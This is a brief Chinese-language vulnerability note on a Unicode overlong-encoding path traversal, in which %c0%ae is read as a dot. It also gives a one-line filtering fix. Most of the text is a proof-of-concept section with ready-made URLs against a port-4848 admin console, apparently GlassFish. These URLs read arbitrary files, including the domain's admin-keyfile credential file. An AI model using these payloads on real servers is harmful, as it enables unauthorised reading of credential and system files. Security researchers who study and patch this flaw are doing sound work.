#实质

unicode编码缺陷导致同一代码的多重含义,导致操作系统对代码的错误解析。典型案例:%c0%ae会被识别为./
参考:https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode#Description

#POC

…/%c0%ae%c0%ae/%c0%ae%c0%ae/……
可以用来读取任意文件
某漏洞点:
构造 http://xxx.xx.xxx.xxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/

再访问 http://xxx.xx.xxx.xxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Users/Administrator/Desktop/setup.nsi

其余案例:
http://192.168.147.148:4848/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./domains/domain1/config/admin-keyfile

#修复方法

过滤 unicode解码后的字符串,防止出现”.” “/“;

#网站

查询IP或域名 http://www.webscan.cc/